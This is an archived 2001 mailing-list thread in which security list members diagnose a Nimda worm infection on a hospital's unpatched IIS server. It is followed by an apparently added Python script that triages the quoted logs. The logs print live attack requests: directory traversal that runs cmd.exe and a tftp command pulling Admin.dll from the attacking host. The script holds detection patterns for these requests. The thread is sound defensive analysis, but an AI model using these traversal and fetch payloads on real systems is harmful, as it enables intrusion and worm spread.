Mike,

Sorry for the broken link, here is a working one:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/website/defendwb.asp

I believe that IIS rel 3.0 is not a very well supported release and that you should probably consider upgrading to something a little more current. NT 4 at the SP3 level also has many other security issues.

Doug

> -----Original Message-----
> From: owner-crime@/var/spool/majordomo/lists/crime
> [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of dldean
> Sent: Friday, September 21, 2001 2:47 PM
> To: J.Michael Cuciti; Kuo Jimmy
> Cc: crime@private
> Subject: RE: [RE: [RE: Any leads?]]
>
>
> Mike,
>
> Here is a good starting place
>
> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
>
> This link is for a Microsoft TechNet page describing security issues for web sites. They also have a "batten down the hatches" script for IIS but I cannot find the url for that page.
>
>
> Doug
>
> > -----Original Message-----
> > From: owner-crime@/var/spool/majordomo/lists/crime
> > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of
> > J.Michael Cuciti
> > Sent: Friday, September 21, 2001 2:33 PM
> > To: dldean; Kuo Jimmy
> > Cc: crime@private
> > Subject: Re: [RE: [RE: Any leads?]]
> >
> >
> > Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the directories the Event Viewer is referencing do not exist on my system. I have followed all instructions for removal from various postings from CRIME. No files referenced in postings are on my system.
> >
> > Do any of you know how I might stop this attack?
> >
> > -Mike
> >
> >
> >
> > dldean@private (dldean) wrote:
> > This is 206.98.124.52 receiving get requests for the admin.dll from 206.98.79.246 and directory requests for his machine from 206.252.224.50 & 208.238.181.162 .
> >
> > Doug
> >
> > > -----Original Message-----
> > > From: owner-crime@/var/spool/majordomo/lists/crime
> > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
> > > Jimmy
> > > Sent: Friday, September 21, 2001 2:06 PM
> > > Cc: crime@private
> > > Subject: RE: [RE: Any leads?]
> > >
> > >
> > > Oh, I didn't notice the followup questions you asked the first time.
> > >
> > > I don't know about the structure of your logs. But are you 206.98.124.52?
> > >
> > > Could someone who reads IIS logs say if this is him sending or receiving GETs?
> > >
> > > And this is definitely Nimda. I just don't know if you're the target or the culprit. If you haven't upgraded, I'm tempted to believe you're infected and attacking others. The TFTP command shows up only on or after infection. And ADMIN.DLL (Nimda is admin spelt backwards) is also something that shows up after infection. But then you say you don't have it...
> > >
> > > Jimmy
> > >
> > > > -----Original Message-----
> > > > From: J.Michael Cuciti [SMTP:mcuciti@private]
> > > > Sent: Friday, September 21, 2001 1:44 PM
> > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri
> > > > Cc: crime@private
> > > > Subject: Re: [RE: Any leads?]
> > > >
> > > > All:
> > > >
> > > > I still have a script trying to run, but the location and folder doesn't exist. This is what I found in my log file:
> > > >
> > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
> > > >
> > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
> > > >
> > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
> > > >
> > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > > >
> > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
> > > >
> > > > If anybody knows what this is, please 'spain it to me.
> > > >
> > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this, not my fault :-) )
> > > >
> > > > In the event log I see this same type of message running every few minutes. The script is supposedly running from \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist.
> > > >
> > > > Thanks...
> > > >
> > > > Mike Cuciti
> > > > Network Service and Support Manager
> > > > Tuality Healthcare
> > > > 681.1749
> > > >
> > > >
> > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
> > > > >The Melissa author was caught because he posted the infectious document from his own AOL account to a news group, rather than releasing it through a hacked account. His guilt was confirmed when the serial number in the document matched the PC in the dumpster outside his bedroom :-)
> > > >
> > > > No. He used a hacked acct. But we identified the exact time of the use of the acct (newsgroup posting message ID) and the FBI traced the phone records.
> > > >
> > > > And the PC was destroyed and never located.
> > > >
> > > > Where did you get your version of the story?
> > > >
> > > > >But Code Red and its derivatives are not Office documents, and therefore have no serial numbers. That investigators appear to have no leads months after Code Red appeared tells me that it was likely released to the wild from a compromised machine, or perhaps simultaneously released from multiple compromised machines. If the author(s) were good, then those compromised machines were initially attacked from other compromised machines. Likely all of these initial release vector machines have long since been wiped and re-installed, and the links to the author(s) have been cut.
> > > >
> > > > We have some "first instances" of traffic. I don't know what the FBI's doing with the information gathered so far. But I agree that it's difficult and not likely.
> > > >
> > > > Jimmy
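The log lines Mike posted are in the Microsoft IIS log file format (comma separated), and Jimmy's question, whether this host is sending or receiving the GETs, can be read straight off them: the first field is the client that sent the request and the seventh is the server that logged it. The following Python is an added example, not code from the original thread; the five sample records are constructed from the ones quoted above, re-joined onto one line each, and the field names are my own labels for the IIS format.

```python
"""Triage of IIS-format log lines for the Nimda request shapes quoted above.

Added example; not code from the original mailing-list post.  SAMPLE_LOG is
constructed from the five requests in the thread, one record per line.
"""
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote_plus

# Microsoft IIS log file format: 15 comma-separated fields.  These names are
# my own labels; the order is client IP, user, date, time, service, server
# name, server IP, time taken, bytes received, bytes sent, HTTP status,
# Win32 status, method, URI stem, URI query.
FIELDS = ("c_ip", "user", "date", "time", "service", "server", "s_ip",
          "time_taken", "cs_bytes", "sc_bytes", "status", "win32_status",
          "method", "stem", "query")

# Constructed sample input: the thread's five records, re-joined onto one line each.
SAMPLE_LOG = r"""
206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
"""

# "tftp -i <host> GET <file>": the target is told to pull the worm body from
# the requesting host, so the host named here is the infected peer.
TFTP_FETCH = re.compile(r"tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)", re.I)


@dataclass
class Finding:
    c_ip: str                   # requester: the attacking host
    s_ip: str                   # server that logged the request: the target
    status: int
    technique: str              # "traversal-cmd" or "root.exe"
    stage: str                  # "payload-fetch" (tftp) or "recon" (e.g. dir)
    succeeded: bool             # 200: IIS resolved the path and ran the command
    tftp_source: Optional[str]
    payload: Optional[str]


def parse_line(line: str) -> Optional[dict]:
    """Split one IIS-format record into a dict; None for blank or short lines.
    Splitting on commas is enough for these records; a query string that
    itself contained a comma would need a real CSV reader."""
    parts = [p.strip() for p in line.strip().rstrip(",").split(",")]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(rec: dict) -> Optional[Finding]:
    """Flag the two request shapes seen in the thread; None for anything else."""
    stem = unquote_plus(rec["stem"]).lower()
    query = unquote_plus(rec["query"])
    if stem.endswith("/root.exe"):
        # root.exe is the copy of cmd.exe that Code Red II left in /scripts;
        # Nimda probes for it so it can skip the traversal.
        technique = "root.exe"
    elif ".." in stem and stem.endswith("cmd.exe"):
        # ..%2f.., ..%5c.., ..A..: traversal out of /scripts into
        # winnt/system32, running cmd.exe with the query as its arguments.
        technique = "traversal-cmd"
    else:
        return None
    m = TFTP_FETCH.search(query)
    status = int(rec["status"])
    return Finding(
        c_ip=rec["c_ip"], s_ip=rec["s_ip"], status=status, technique=technique,
        stage="payload-fetch" if m else "recon",
        succeeded=status == 200,
        tftp_source=m.group(1) if m else None,
        payload=m.group(2) if m else None,
    )


def triage(log_text: str) -> list:
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            f = classify(rec)
            if f:
                findings.append(f)
    return findings


def summarize(findings: list) -> dict:
    """Who sent the GETs, who received them, and how many got a 200."""
    return {
        "targets": sorted({f.s_ip for f in findings}),
        "attackers": sorted({f.c_ip for f in findings}),
        "executed": sum(1 for f in findings if f.succeeded),
        "payload_sources": sorted({f.tftp_source for f in findings if f.tftp_source}),
    }


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        extra = f"  fetch {f.payload} from {f.tftp_source}" if f.tftp_source else ""
        print(f"{f.c_ip:>16} -> {f.s_ip}  {f.technique:<13} {f.stage:<13} "
              f"{'EXECUTED' if f.succeeded else 'failed ' + str(f.status)}{extra}")
    print(summarize(found))
```

On the posted records the target is 206.98.124.52 and the three remote addresses are the requesters, so the log shows the host receiving, not sending. A 200 on a cmd.exe traversal line means IIS resolved the path and ran the command; for the first two records that command was tftp pulling Admin.dll from 206.98.79.246, so the host should be treated as compromised even if Admin.dll has since been removed. The 403 and 500 lines are probes that did not get through.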
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:49 PDT